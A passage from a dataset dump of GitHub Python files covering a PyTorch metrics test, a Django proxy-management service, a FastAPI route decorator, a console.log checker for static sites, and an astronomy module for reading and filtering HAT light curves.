None:\n model = torch.nn.Linear(32, 64)\n y_pred = model(torch.zeros([1, 32]))\n y_true = torch.ones_like(y_pred)\n loss = torch.nn.MSELoss()(y_pred, y_true)\n loss.backward()\n assert metrics.grad_norm(model).shape == ()\n\n\n@torch.no_grad()\ndef test_weight_norm() -> None:\n model = torch.nn.Linear(32, 64)\n assert np.allclose(metrics.weight_norm(model), model.weight.norm(2))\n","repo_name":"brentspell/hifi-gan-bwe","sub_path":"tests/test_metrics.py","file_name":"test_metrics.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","stars":172,"dataset":"github-code","pt":"85"} +{"seq_id":"28579901930","text":"from proxy_service_provider.apps.configuration.serializers.proxy_serializer import ProxiesSerializer\nfrom proxy_service_provider.apps.configuration.models.proxies import Proxies\nfrom proxy_service_provider.apps.configuration.models.test_url import TestURL\nfrom proxy_service_provider.apps.configuration.models.proxy_functionality_test import ProxyFunctionalityTest\nfrom proxy_service_provider.apps.configuration.services.proxy_fetcher import ProxyFetching\nfrom django.db.models import Q\nfrom datetime import datetime\nimport time\n\nclass ProxyServices:\n\n def bulk_create(self, proxy_provider, ip_list: list):\n counter = 0\n for item in ip_list:\n data = {\n 'ip_address': item[0],\n 'port_number': item[1],\n 'proxy_provider_id': proxy_provider.id,\n 'is_tested': False,\n 'last_found': datetime.now(),\n 'first_found': datetime.now()\n }\n i = self.create(data)\n if i is not None:\n counter += 1\n return counter\n\n def bulk_delete(self, proxy_provider_id, ip_list: list):\n counter = 0\n try:\n find_proxy = Proxies.objects.filter(proxy_provider_id=proxy_provider_id).exclude(ip_address__in=ip_list)\n counter = find_proxy.count()\n find_proxy.delete()\n return counter\n except Exception as ex:\n return counter, []\n\n def bulk_update(self, proxy_provider_id, ip_list: list):\n counter = 0\n only_ips = [i[0] for i in ip_list]\n # Delete not listed ip_address\n counts = self.bulk_delete(proxy_provider_id=proxy_provider_id,ip_list=only_ips)\n find_existed_ip = Proxies.objects.values_list('ip_address').filter(proxy_provider_id=proxy_provider_id)\n find_existed_ip.update(last_found = datetime.now())\n list_find_existed_ip = list(find_existed_ip)\n existed_proxies = len(list_find_existed_ip)\n for item in ip_list:\n if item[0] not in list_find_existed_ip:\n data = {\n 'ip_address': item[0],\n 'port_number': item[1],\n 'proxy_provider_id': proxy_provider_id,\n 'is_tested': False,\n 'last_found': datetime.now(),\n 'first_found': datetime.now()\n }\n i = self.create(data)\n if i is not None:\n counter += 1\n return counter+existed_proxies\n\n\n def perform_functionality_test(self, proxy_provider, test_url_id: id):\n try:\n proxy_provider.functionality_test_state = 'running'\n proxy_provider.save()\n proxies = Proxies.objects.filter(proxy_provider_id=proxy_provider.id)\n test_url_id = TestURL.objects.get(id=test_url_id)\n proxy_fetching = ProxyFetching()\n count = 0\n for i in proxies:\n print(i)\n count +=1\n output = proxy_fetching.pass_proxy_test(proxy_address=i.ip_address,proxy_port=i.port_number,test_url=test_url_id.test_url_address, json_res=test_url_id.is_output_json)\n i.is_tested = output['result']\n i.last_successful_functionality_test = datetime.now()\n i.save()\n result_data = {\n 'proxy_id': i,\n 'test_url_id':test_url_id,\n 'is_test_passed': output['result'],\n 'test_mesasge': output['output']\n }\n print(result_data)\n func_test = ProxyFunctionalityTest(**result_data)\n func_test.save()\n proxy_provider.functionality_test_state = 'completed'\n proxy_provider.save()\n return None\n except Exception as ex:\n print(ex)\n return None\n\n def create(self, kw: dict):\n \"\"\"\n :type kw: object\n \"\"\"\n proxy = ProxiesSerializer(data=kw)\n if proxy.is_valid():\n proxy.save()\n return proxy\n else:\n return None\n","repo_name":"musfiqurcse/proxy-service-provider","sub_path":"src/proxy_service_provider/apps/configuration/services/proxy_services.py","file_name":"proxy_services.py","file_ext":"py","file_size_in_byte":4161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"19004534721","text":"from functools import wraps\n\n_api_routes_registry = []\n\n\nclass api_route(object):\n def __init__(self, path, **kwargs):\n self._path = path\n self._kwargs = kwargs\n\n def __call__(self, fn):\n cls, method = fn.__repr__().split(\" \")[1].split(\".\")\n _api_routes_registry.append(\n {\n \"fn\": fn,\n \"path\": self._path,\n \"kwargs\": self._kwargs,\n \"cls\": cls,\n \"method\": method,\n }\n )\n\n @wraps(fn)\n def decorated(*args, **kwargs):\n return fn(*args, **kwargs)\n\n return decorated\n\n\ndef add_api_routes(router):\n for reg in _api_routes_registry:\n if router.__class__.__name__ == reg[\"cls\"]:\n router.add_api_route(path=reg[\"path\"], endpoint=getattr(router, reg[\"method\"]), **reg[\"kwargs\"])\n","repo_name":"darkchats/darkbuild","sub_path":"funbuild/tool/fastapi.py","file_name":"fastapi.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"43445538549","text":"# coding: utf-8\nimport logging\nimport re\nimport os\nfrom cactus.test_base import CactusTestBase\n\n\nclass ConsoleLogTest(CactusTestBase):\n def run(self):\n basedir = self.site.paths['dist']\n found = []\n for (path, dirs, files) in os.walk(basedir):\n for file in files:\n if file.lower().endswith(\".js\"):\n lineno = 0\n f = os.path.join(path, file)\n for line in open(f,'r'):\n lineno += 1\n if re.search(r'console\\.log', line, re.I):\n found.append({\n \"file\": f,\n \"line\": lineno,\n \"content\": line,\n })\n if found:\n logging.warn(\"==========================================================================\")\n logging.warn(\"Found {0} console.log statements:\".format(len(found)))\n for l in found:\n logging.warn(\"{0}:{1}\".format(l.get(\"file\"), l.get(\"line\")))\n logging.warn(l.get(\"content\"))\n logging.warn(\"==========================================================================\")\n return False\n return True","repo_name":"randomknowledge/Cactus_Refactored","sub_path":"cactus/tests/console_log.py","file_name":"console_log.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"85"} +{"seq_id":"7885613573","text":"#!/usr/bin/env python\r\n\r\n'''\r\nlcutils_hatlc.py - Waqas Bhatti (wbhatti@astro.princeton.edu) - Dec 2013\r\n\r\nContains various useful tools for reading, writing, and filtering consolidated\r\nHAT LCs produced by the HAT LC server.\r\n\r\n'''\r\n\r\nimport logging\r\nimport os.path\r\nimport hashlib\r\nimport gzip\r\nimport bz2\r\n\r\n\r\nimport numpy as np\r\nimport pyfits\r\n\r\n###################\r\n## LOCAL IMPORTS ##\r\n###################\r\n\r\n#from timeutils import jd_to_bjd, jd_to_hjd # IMPORT TIMEUTILS later; you need CSPICE/PySPICE. Check if Della has those... // They do NOT!\r\nfrom timeutils_temp import jd_to_bjd, jd_to_hjd\r\n\r\n\r\nimport lcutils_config as conf\r\nimport lcutils_formatters as lcform\r\nimport lcutils_postprocessing as lcpp\r\n\r\n\r\n#############\r\n## LOGGING ##\r\n#############\r\n\r\n# setup a logger\r\nLOGGER = logging.getLogger('lcutils_hatlc')\r\nLOGGER.addHandler(logging.NullHandler())\r\n\r\n# default to debug mode = False\r\nDEBUGMODE = False\r\n\r\ndef set_debug(debugbool):\r\n globals()['DEBUGMODE'] = debugbool\r\n lcform.set_debug(True)\r\n\r\n\r\n#################################################\r\n## FUNCTIONS TO DEAL WITH THE CONSOLIDATED LCS ##\r\n#################################################\r\n\r\ndef read_consolidated_hatlc(hatlc,\r\n forceformat=None,\r\n forcecompression=None):\r\n '''\r\n This reads a consolidated HAT LC written by the functions above.\r\n\r\n Returns a dict.\r\n\r\n '''\r\n\r\n lcfname = os.path.basename(hatlc)\r\n\r\n if forceformat and forcecompression:\r\n\r\n if 'gz' in forcecompression:\r\n lcf = gzip.open(hatlc,'rb')\r\n elif 'bz2' in forcecompression:\r\n lcf = bz2.BZ2File(hatlc,'rb')\r\n\r\n else:\r\n\r\n # unzip the files first\r\n if '.gz' in lcfname:\r\n lcf = gzip.open(hatlc,'rb')\r\n elif '.bz2' in lcfname:\r\n lcf = bz2.BZ2File(hatlc, 'rb')\r\n else:\r\n lcf = open(hatlc,'rb')\r\n\r\n if '.fits' in lcfname or (forceformat and forceformat == 'fits'):\r\n\r\n hdulist = pyfits.open(lcf)\r\n objectinfo = hdulist[0].header\r\n objectlc = hdulist[1].data\r\n lccols = objectlc.columns.names\r\n hdulist.close()\r\n lcf.close()\r\n\r\n lcdict = {}\r\n\r\n for col in lccols:\r\n lcdict[col] = np.array(objectlc[col])\r\n\r\n lcdict['hatid'] = objectinfo['hatid']\r\n lcdict['twomassid'] = objectinfo['2massid']\r\n lcdict['ra'] = objectinfo['ra']\r\n lcdict['dec'] = objectinfo['dec']\r\n lcdict['mags'] = [objectinfo[x] for x in ('vmag','rmag','imag',\r\n 'jmag','hmag','kmag')]\r\n lcdict['ndet'] = objectinfo['ndet']\r\n lcdict['hatstations'] = objectinfo['hats']\r\n lcdict['filters'] = objectinfo['filters']\r\n lcdict['columns'] = lccols\r\n\r\n return lcdict\r\n\r\n elif '.csv' in lcfname or '.hatlc' in lcfname or (forceformat and\r\n forceformat == 'csv'):\r\n\r\n lcflines = lcf.readlines()\r\n lcf.close()\r\n\r\n # now process the read-in LC\r\n objectdata = [x for x in lcflines if x.startswith('#')]\r\n objectlc = [x for x in lcflines if not x.startswith('#')]\r\n objectlc = [x for x in objectlc if len(x) > 1]\r\n\r\n if '.csv' in lcfname:\r\n objectlc = [x.split(',') for x in objectlc]\r\n else:\r\n objectlc = [x.split() for x in objectlc]\r\n\r\n # transpose split rows to get columns\r\n objectlc = zip(*objectlc)\r\n\r\n # read the header to figure out the object's info and column names\r\n objectdata = [x.strip('#') for x in objectdata]\r\n objectdata = [x.strip() for x in objectdata]\r\n objectdata = [x for x in objectdata if len(x) > 0]\r\n\r\n hatid, twomassid = objectdata[0].split(' - ')\r\n ra, dec = objectdata[1].split(', ')\r\n ra = float(ra.split(' = ')[-1].strip(' deg'))\r\n dec = float(dec.split(' = ')[-1].strip(' deg'))\r\n\r\n vmag, rmag, imag, jmag, hmag, kmag = objectdata[2].split(', ')\r\n vmag = float(vmag.split(' = ')[-1])\r\n rmag = float(rmag.split(' = ')[-1])\r\n imag = float(imag.split(' = ')[-1])\r\n jmag = float(jmag.split(' = ')[-1])\r\n hmag = float(hmag.split(' = ')[-1])\r\n kmag = float(kmag.split(' = ')[-1])\r\n\r\n ndet = int(objectdata[3].split(': ')[-1])\r\n hatstations = objectdata[4].split(': ')[-1]\r\n\r\n filterhead_ind = objectdata.index('Filters used:')\r\n columnhead_ind = objectdata.index('Columns:')\r\n\r\n filters = objectdata[filterhead_ind:columnhead_ind]\r\n\r\n columndefs = objectdata[columnhead_ind+1:]\r\n\r\n columns = []\r\n for line in columndefs:\r\n\r\n colnum, colname, coldesc = line.split(' - ')\r\n columns.append(colname)\r\n\r\n lcdict = {}\r\n\r\n # now write all the columns to the output dictionary\r\n for ind, col in enumerate(columns):\r\n\r\n # this formats everything nicely using our existing column\r\n # definitions\r\n lcdict[col] = np.array([conf.TEXTLC_OUTPUT_COLUMNS[col][3](x)\r\n for x in objectlc[ind]])\r\n\r\n # write the object metadata to the output dictionary\r\n lcdict['hatid'] = hatid\r\n lcdict['twomassid'] = twomassid.strip('2MASS J')\r\n lcdict['ra'] = ra\r\n lcdict['dec'] = dec\r\n lcdict['mags'] = [vmag, rmag, imag, jmag, hmag, kmag]\r\n lcdict['ndet'] = ndet\r\n lcdict['hatstations'] = hatstations.split(', ')\r\n lcdict['filters'] = filters[1:]\r\n lcdict['cols'] = columns\r\n\r\n return lcdict\r\n\r\n\r\n\r\ndef write_consolidated_hatlc(lcdict,\r\n outtype='ssv',\r\n compress='gz',\r\n outdir=None,\r\n filterhash=None,\r\n normalized=False):\r\n '''\r\n This writes a LC dict from a HATLC back to a HATLC. Useful if any\r\n modifications such as filtering on columns, etc. have been made to the\r\n lcdict.\r\n\r\n '''\r\n\r\n # generate the objinfo tuple\r\n objinfo = (lcdict['hatid'],\r\n lcdict['ra'],\r\n lcdict['dec'],\r\n lcdict['mags'][0],\r\n lcdict['mags'][1],\r\n lcdict['mags'][2],\r\n lcdict['mags'][3],\r\n lcdict['mags'][4],\r\n lcdict['mags'][5],\r\n lcdict['twomassid'])\r\n\r\n\r\n if outtype == 'json':\r\n outlc = lcform.OUTPUTLC_FORMATTERS['json'](lcdict,\r\n objinfo)\r\n\r\n\r\n elif outtype is not None:\r\n outlc = lcform.OUTPUTLC_FORMATTERS[outtype](lcdict,\r\n objinfo,\r\n outputdir=outdir,\r\n compress=compress,\r\n filterhash=filterhash,\r\n normalized=normalized)\r\n else:\r\n outlc = lcform.OUTPUTLC_FORMATTERS['lcdict'](lcdict,\r\n objinfo)\r\n\r\n return outlc\r\n\r\n\r\n\r\ndef reform_consolidated_hatlc(lcdict,\r\n columns='default',\r\n outtype='ssv',\r\n outdir=None,\r\n compress='gz',\r\n normalize=False,\r\n filterhash=None):\r\n '''\r\n This reforms a consolidated HATLC dictionary, returning only the columns\r\n requested in columns:\r\n\r\n columns = '' or a comma separated list of columns\r\n from TEXTLC_OUTPUT_COLUMNS\r\n\r\n The other parameters are the same as for get_hat_lc.\r\n\r\n '''\r\n\r\n # parse the columns\r\n if columns in ('default', 'epdlc', 'tfalc', 'redlc', 'fullred', 'full'):\r\n\r\n cols = conf.HATLC_OUTPUT_COLUMNS[columns]\r\n\r\n else:\r\n\r\n cols = columns.split(',')\r\n\r\n if not all([col in conf.TEXTLC_OUTPUT_COLUMNS for col in cols]):\r\n if LOGGER:\r\n LOGGER.error('some of the requested columns are invalid')\r\n if DEBUGMODE:\r\n print('lcutils: some of the requested columns are invalid')\r\n\r\n return None\r\n\r\n # make a copy of the lcdict and remove the columns we don't want\r\n modlcdict = lcdict.copy()\r\n\r\n # cols we don't want\r\n colswantedset = set(cols)\r\n colspresentset = set(lcdict['cols'])\r\n colstoremove = colspresentset - colswantedset\r\n\r\n for col in colstoremove:\r\n del modlcdict[col]\r\n\r\n modlcdict['cols'] = cols\r\n\r\n # now deal with columns to add to the output dict\r\n\r\n # deal with an RSTF column\r\n if 'RSTF' in cols:\r\n\r\n rstf = ['%s-%s' % (x,y) for (x,y) in zip(lcdict['STF'],\r\n lcdict['CFN'])]\r\n modlcdict['RSTF'] = rstf\r\n\r\n # deal with a MJD column\r\n if ('MJD' in cols and\r\n 'MJD' not in lcdict['cols'] and\r\n 'RJD' in lcdict['cols']):\r\n\r\n rjd = lcdict['RJD']\r\n rjd = np.array([float(x) for x in rjd])\r\n\r\n # convert to MJD\r\n mjd = rjd - 0.5\r\n\r\n modlcdict['MJD'] = mjd.tolist()\r\n\r\n # deal with a FJD column\r\n if ('FJD' in cols and\r\n 'FJD' not in lcdict['cols'] and\r\n 'RJD' in lcdict['cols']):\r\n\r\n rjd = lcdict['RJD']\r\n rjd = np.array([float(x) for x in rjd])\r\n\r\n fjd = rjd + 2400000.0\r\n\r\n modlcdict['FJD'] = fjd.tolist()\r\n\r\n # get the obslon, obslat, obsalt required for conversion to BJD or HJD, but\r\n # only if the HJD/BJD columns aren't in the input lcdict\r\n if 'BJD' in cols or 'HJD' in cols and (not ('BJD' in lcdict['cols'] or\r\n 'HJD' in lcdict['cols'])):\r\n\r\n # grab the STF column and get the station ids\r\n stf = lcdict['STF']\r\n networks = lcdict['NET']\r\n\r\n # get the station locations to convert to BJD\r\n obslat, obslon, obsalt = ([conf.HAT_LOCATIONS[x][y][0] for\r\n (x,y) in zip(networks,stf)],\r\n [conf.HAT_LOCATIONS[x][y][1] for\r\n (x,y) in zip(networks,stf)],\r\n [conf.HAT_LOCATIONS[x][y][2] for\r\n (x,y) in zip(networks,stf)])\r\n objra = lcdict['ra']\r\n objdec = lcdict['dec']\r\n\r\n # deal with a requested BJD column\r\n if ('BJD' in cols and\r\n 'BJD' not in lcdict['cols'] and\r\n 'RJD' in lcdict['cols']):\r\n\r\n rjd = lcdict['RJD']\r\n rjd = np.array([float(x) for x in rjd])\r\n\r\n # convert to full JD\r\n rjd = rjd + 2400000.0\r\n\r\n # convert to BJD\r\n bjd = [\r\n jd_to_bjd(x,objra,objdec,y,z,w)\r\n for (x,y,z,w) in zip(rjd,obslat,obslon,obsalt)\r\n ]\r\n\r\n modlcdict['BJD'] = bjd\r\n\r\n # deal with a HJD column\r\n if ('HJD' in cols and\r\n 'HJD' not in lcdict['cols'] and\r\n 'RJD' in lcdict['cols']):\r\n\r\n rjd = lcdict['RJD']\r\n rjd = np.array([float(x) for x in rjd])\r\n\r\n # convert to full JD\r\n rjd = rjd + 2400000.0\r\n\r\n # convert to BJD\r\n hjd = [jd_to_hjd(x,objra,objdec) for x in rjd]\r\n\r\n modlcdict['HJD'] = hjd\r\n\r\n\r\n # if we're supposed to normalize magnitudes, do so\r\n if normalize:\r\n\r\n # figure out what columns we're normalizing\r\n if normalize is True:\r\n normalizecols = 'all'\r\n elif isinstance(normalize, str) or isinstance(normalize, unicode):\r\n normalizecols = normalize\r\n\r\n lcpp.normalize_mags_to_group_median(modlcdict,\r\n magcols=normalizecols)\r\n\r\n\r\n\r\n # now write this modified lcdict as the requested output type\r\n # note that outtype=None just returns the modified lcdict\r\n outlc = write_consolidated_hatlc(modlcdict,\r\n outtype=outtype,\r\n outdir=outdir,\r\n compress=compress,\r\n filterhash=filterhash,\r\n normalized=normalize)\r\n\r\n del modlcdict\r\n\r\n return outlc\r\n\r\n\r\n\r\ndef parse_hatlc_filters(filters):\r\n '''\r\n This parses a filter sequence as defined in filter_consolidated_hatlc below.\r\n\r\n '''\r\n\r\n filter_operators = {'and':'&',\r\n 'or':'|'}\r\n\r\n # this holds the elements for the np.where statement we're building\r\n where_eval_strlist = []\r\n\r\n for filter_ind, datafilter in enumerate(filters):\r\n\r\n # if the this filter has 3 elems, it needs to be ANDed/ORed with\r\n # other filters\r\n if len(datafilter) == 3:\r\n\r\n # the first filter can't have three elems\r\n if filter_ind == 0:\r\n\r\n if LOGGER:\r\n LOGGER.warning('filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n if DEBUGMODE:\r\n print('lcutils.parse_hatlc_filters: filter %s is bad,'\r\n ' ignoring...' %\r\n list(datafilter))\r\n\r\n continue\r\n\r\n # deal with three-elem filters as usual\r\n else:\r\n\r\n filter_op, filter_col, filter_conds = datafilter\r\n\r\n # if the filter operator is not legit or if the filter column\r\n # doesn't make sense, ignore this filter\r\n if ((filter_op not in ['and','or']) or\r\n (filter_col not in conf.TEXTLC_OUTPUT_COLUMNS)):\r\n\r\n if LOGGER:\r\n LOGGER.warning('filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n if DEBUGMODE:\r\n print('lcutils.parse_hatlc_filters: '\r\n 'filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n\r\n continue\r\n\r\n # otherwise, try to process this filter\r\n else:\r\n\r\n # parse the filter conditions\r\n filter_conds = filter_conds.split()\r\n cond_op = filter_conds[0]\r\n\r\n # if the operator is not legal, ignore this filter\r\n if cond_op not in conf.CONDITION_OPERATORS:\r\n\r\n if LOGGER:\r\n LOGGER.warning('filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n if DEBUGMODE:\r\n print('lcutils.parse_hatlc_filters:'\r\n ' filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n\r\n continue\r\n\r\n # if the operator is 'between' and there aren't two filter\r\n # operands, ignore this filter\r\n elif ((cond_op == 'between') and\r\n (len(filter_conds[1:]) != 2)):\r\n\r\n if LOGGER:\r\n LOGGER.warning('filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n if DEBUGMODE:\r\n print('lcutils.parse_hatlc_filters:'\r\n ' filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n\r\n continue\r\n\r\n # if the operator is not 'between' and there's more than one\r\n # operand, ignore this filter\r\n elif ((cond_op != 'between') and\r\n (len(filter_conds[1:]) != 1)):\r\n\r\n if LOGGER:\r\n LOGGER.warning('filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n if DEBUGMODE:\r\n print('lcutils.parse_hatlc_filters:'\r\n ' filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n\r\n continue\r\n\r\n # if all the checks above pass, then process the filter\r\n # definition\r\n else:\r\n\r\n filter_cond_elements = filter_conds\r\n filter_cond_operator = filter_cond_elements[0]\r\n\r\n # deal with the between operator\r\n if (len(filter_cond_elements[1:]) > 1 and\r\n filter_cond_operator == 'between'):\r\n\r\n operand1, operand2 = filter_cond_elements[1:]\r\n\r\n if operand1.isalpha():\r\n operand1 = \"'%s'\" % operand1\r\n if operand2.isalpha():\r\n operand2 = \"'%s'\" % operand2\r\n\r\n # take care of the special case of FLT, FLD having\r\n # string format but possibly numerical values\r\n if filter_col in ('FLT', 'FLD'):\r\n operand1 = \"'%s'\" % operand1\r\n operand2 = \"'%s'\" % operand2\r\n\r\n condition_string = conf.CONDITION_OPERATORS[\r\n filter_cond_operator\r\n ].format(\r\n col=filter_col,\r\n operand1=operand1,\r\n operand2=operand2\r\n )\r\n\r\n # deal with the other operators\r\n else:\r\n\r\n operand1 = filter_cond_elements[1]\r\n\r\n if operand1.isalpha():\r\n operand1 = \"'%s'\" % operand1\r\n\r\n # take care of the special case of FLT, FLD having\r\n # string format but possibly numerical values\r\n if filter_col in ('FLT', 'FLD'):\r\n operand1 = \"'%s'\" % operand1\r\n\r\n condition_string = conf.CONDITION_OPERATORS[\r\n filter_cond_operator\r\n ].format(\r\n col=filter_col,\r\n operand1=operand1\r\n )\r\n\r\n full_filter_string = '%s %s' % (\r\n filter_operators[filter_op],\r\n condition_string\r\n )\r\n where_eval_strlist.append(full_filter_string)\r\n\r\n\r\n # deal with two element filter definitions\r\n elif len(list(datafilter)) == 2:\r\n\r\n # process the first filter\r\n if filter_ind == 0:\r\n\r\n filter_col, filter_conds = datafilter\r\n\r\n # if the filter column is not legit, ignore this filter\r\n if (filter_col not in conf.TEXTLC_OUTPUT_COLUMNS):\r\n\r\n if LOGGER:\r\n LOGGER.warning('filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n if DEBUGMODE:\r\n print('lcutils.parse_hatlc_filters:'\r\n ' filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n\r\n continue\r\n\r\n # otherwise, try to process this filter\r\n else:\r\n\r\n # parse the filter conditions\r\n filter_conds = filter_conds.split()\r\n cond_op = filter_conds[0]\r\n\r\n # if the filter condition's operator isn't legit, ignore\r\n # this filter\r\n if cond_op not in conf.CONDITION_OPERATORS:\r\n\r\n if LOGGER:\r\n LOGGER.warning('filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n if DEBUGMODE:\r\n print('lcutils.parse_hatlc_filters:'\r\n ' filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n\r\n continue\r\n\r\n # if the filter condition's operator is between and the\r\n # number of filter operands is not 2, then ignore this\r\n # filter\r\n elif ((cond_op == 'between') and\r\n (len(filter_conds[1:]) != 2)):\r\n\r\n if LOGGER:\r\n LOGGER.warning('filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n if DEBUGMODE:\r\n print('lcutils.parse_hatlc_filters:'\r\n ' filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n\r\n continue\r\n\r\n # otherwise, if we have another filter, but the number of\r\n # operands is not 1, ignore this filter\r\n elif ((cond_op != 'between') and\r\n (len(filter_conds[1:]) != 1)):\r\n\r\n if LOGGER:\r\n LOGGER.warning('filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n if DEBUGMODE:\r\n print('lcutils.parse_hatlc_filters:'\r\n ' filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n\r\n continue\r\n\r\n # if all of the tests above pass, then process this filter\r\n else:\r\n\r\n filter_cond_elements = filter_conds\r\n filter_cond_operator = filter_cond_elements[0]\r\n\r\n # deal with the between operator\r\n if (len(filter_cond_elements[1:]) > 1 and\r\n filter_cond_operator == 'between'):\r\n\r\n operand1, operand2 = filter_cond_elements[1:]\r\n\r\n if operand1.isalpha():\r\n operand1 = \"'%s'\" % operand1\r\n if operand2.isalpha():\r\n operand2 = \"'%s'\" % operand2\r\n\r\n # take care of the special case of FLT, FLD having\r\n # string format but possibly numerical values\r\n if filter_col in ('FLT', 'FLD'):\r\n operand1 = \"'%s'\" % operand1\r\n operand2 = \"'%s'\" % operand2\r\n\r\n condition_string = conf.CONDITION_OPERATORS[\r\n filter_cond_operator\r\n ].format(\r\n col=filter_col,\r\n operand1=operand1,\r\n operand2=operand2\r\n )\r\n\r\n # deal with the other operators\r\n else:\r\n\r\n operand1 = filter_cond_elements[1]\r\n if operand1.isalpha():\r\n operand1 = \"'%s'\" % operand1\r\n\r\n # take care of the special case of FLT, FLD having\r\n # string format but possibly numerical values\r\n if filter_col in ('FLT', 'FLD'):\r\n operand1 = \"'%s'\" % operand1\r\n\r\n condition_string = conf.CONDITION_OPERATORS[\r\n filter_cond_operator\r\n ].format(\r\n col=filter_col,\r\n operand1=operand1\r\n )\r\n\r\n full_filter_string = condition_string\r\n where_eval_strlist.append(full_filter_string)\r\n\r\n # if this filter isn't the first one and it has only two elems,\r\n # then it needs to be ANDed with any previous filters\r\n else:\r\n\r\n filter_col, filter_conds = datafilter\r\n filter_conds = filter_conds.split()\r\n filter_op = 'and'\r\n\r\n # if the filter operator or the filter column don't make sense,\r\n # then ignore this filter\r\n if ((filter_op not in ['and','or']) or\r\n (filter_col not in conf.TEXTLC_OUTPUT_COLUMNS)):\r\n\r\n if LOGGER:\r\n LOGGER.warning('filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n if DEBUGMODE:\r\n print('lcutils.parse_hatlc_filters:'\r\n ' filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n\r\n continue\r\n\r\n # otherwise, try to process this filter\r\n else:\r\n\r\n # parse the filter conditions\r\n cond_op = filter_conds[0]\r\n\r\n # if the filter condition's operator isn't legit, then\r\n # ignore this filter\r\n if cond_op not in conf.CONDITION_OPERATORS:\r\n\r\n if LOGGER:\r\n LOGGER.warning('filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n if DEBUGMODE:\r\n print('lcutils.parse_hatlc_filters:'\r\n ' filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n\r\n continue\r\n\r\n # if the filter condition's operator is 'between' but the\r\n # number of operands is not 2, then ignore this filter\r\n elif ((cond_op == 'between') and\r\n (len(filter_conds[1:]) != 2)):\r\n\r\n if LOGGER:\r\n LOGGER.warning('filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n if DEBUGMODE:\r\n print('lcutils.parse_hatlc_filters:'\r\n ' filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n\r\n continue\r\n\r\n # if the filter condition's operator is not 'between' but\r\n # the number of operands is not 1, then ignore this filter\r\n elif ((cond_op != 'between') and\r\n (len(filter_conds[1:]) != 1)):\r\n\r\n if LOGGER:\r\n LOGGER.warning('filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n if DEBUGMODE:\r\n print('lcutils.parse_hatlc_filters:'\r\n ' filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n\r\n continue\r\n\r\n # if all of the tests above pass, then process this filter\r\n else:\r\n\r\n filter_cond_elements = filter_conds\r\n filter_cond_operator = filter_cond_elements[0]\r\n\r\n # deal with the between operator\r\n if (len(filter_cond_elements[1:]) > 1 and\r\n filter_cond_operator == 'between'):\r\n\r\n operand1, operand2 = filter_cond_elements[1:]\r\n\r\n if operand1.isalpha():\r\n operand1 = \"'%s'\" % operand1\r\n if operand2.isalpha():\r\n operand2 = \"'%s'\" % operand2\r\n\r\n # take care of the special case of FLT, FLD having\r\n # string format but possibly numerical values\r\n if filter_col in ('FLT', 'FLD'):\r\n operand1 = \"'%s'\" % operand1\r\n operand2 = \"'%s'\" % operand2\r\n\r\n condition_string = conf.CONDITION_OPERATORS[\r\n filter_cond_operator\r\n ].format(\r\n col=filter_col,\r\n operand1=operand1,\r\n operand2=operand2\r\n )\r\n\r\n # deal with the other operators\r\n else:\r\n\r\n operand1 = filter_cond_elements[1]\r\n\r\n if operand1.isalpha():\r\n operand1 = \"'%s'\" % operand1\r\n\r\n # take care of the special case of FLT, FLD having\r\n # string format but possibly numerical values\r\n if filter_col in ('FLT', 'FLD'):\r\n operand1 = \"'%s'\" % operand1\r\n\r\n condition_string = conf.CONDITION_OPERATORS[\r\n filter_cond_operator\r\n ].format(\r\n col=filter_col,\r\n operand1=operand1\r\n )\r\n\r\n full_filter_string = '%s %s' % (\r\n filter_operators[filter_op],\r\n condition_string\r\n )\r\n where_eval_strlist.append(full_filter_string)\r\n\r\n # if we can't parse this filter at all, then ignore it\r\n else:\r\n\r\n if LOGGER:\r\n LOGGER.warning('filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n if DEBUGMODE:\r\n print('lcutils.parse_hatlc_filters:'\r\n ' filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n\r\n continue\r\n\r\n\r\n # now check for dangling filter operators caused by broken filters in the\r\n # chain\r\n where_eval_checklist = where_eval_strlist[:]\r\n for find, filt in enumerate(where_eval_checklist):\r\n if find == 0 and filt[0] == '&':\r\n where_eval_strlist[0] = (where_eval_strlist[0]).lstrip('& ')\r\n\r\n where_eval_string = (\r\n 'np.where({array_expression})'.format(\r\n array_expression=' '.join(where_eval_strlist)\r\n )\r\n )\r\n\r\n return where_eval_string\r\n\r\n\r\n\r\ndef filter_consolidated_hatlc(hatlc,\r\n filters,\r\n hatlc_is_dict=False,\r\n outtype='ssv',\r\n compress='gz',\r\n outdir=None):\r\n '''\r\n This filters a consolidated hatlc using the filter list given in filters.\r\n\r\n filters is a sequence of tuples describing the conditions on the columns to\r\n satisfy. these MUST follow the rules below.\r\n\r\n condition tuple = ('','','')\r\n\r\n if the first item is left out and/or the condition tuple is not the first or\r\n only one, then all conditions are ANDed together. otherwise, the specified\r\n condition logical operators are 